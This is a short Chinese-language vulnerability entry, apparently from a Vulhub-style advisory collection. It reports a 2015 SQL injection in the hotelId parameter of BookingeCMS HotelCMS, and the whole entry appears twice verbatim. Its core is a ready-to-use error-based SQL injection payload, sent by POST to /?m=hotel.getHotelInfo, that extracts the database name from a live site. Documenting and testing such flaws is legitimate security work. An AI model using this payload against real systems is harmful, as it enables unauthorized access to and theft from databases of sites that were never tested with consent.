VULHUB ™

### 0x01 漏洞简述 提交时间： 2015-09-04 13:33 公开时间： 2015-12-06 09:00 漏洞类型： SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=hotel.getHotelInfo 文件hotelId参数存在注入 ### 0x02 漏洞利用 测试Payload: （post提交） /?m=hotel.getHotelInfo ``` hotelId=11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ```  ### 0x03 参考链接 http://www.wooyun.org/bugs/wooyun-2010-0137378

### 0x01 漏洞简述 提交时间： 2015-09-04 13:33 公开时间： 2015-12-06 09:00 漏洞类型： SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=hotel.getHotelInfo 文件hotelId参数存在注入 ### 0x02 漏洞利用 测试Payload: （post提交） /?m=hotel.getHotelInfo ``` hotelId=11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ```  ### 0x03 参考链接 http://www.wooyun.org/bugs/wooyun-2010-0137378